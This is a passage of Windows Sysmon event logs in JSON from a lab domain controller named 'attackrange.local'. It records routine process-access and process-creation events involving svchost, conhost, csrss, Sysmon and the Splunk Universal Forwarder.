{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6496,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.198\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.198","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6497,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.198\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.198","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6498,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.198\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-045E-5F25-0000-0010A85C0C00}\r\nTargetProcessId: 3380\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.198","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-045E-5F25-0000-0010A85C0C00}","TargetProcessId":"3380","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6499,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.948\r\nProcessGuid: {A837DB8D-045E-5F25-0000-0010715E0C00}\r\nProcessId: 4464\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.948","ProcessGuid":"{A837DB8D-045E-5F25-0000-0010715E0C00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6500,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.948\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-045E-5F25-0000-0010715E0C00}\r\nTargetProcessId: 4464\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.948","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-045E-5F25-0000-0010715E0C00}","TargetProcessId":"4464","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6501,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.948\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-045E-5F25-0000-0010715E0C00}\r\nTargetProcessId: 4464\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.948","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-045E-5F25-0000-0010715E0C00}","TargetProcessId":"4464","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6502,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.948\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.948","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6503,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.948\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.948","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6504,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.948\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 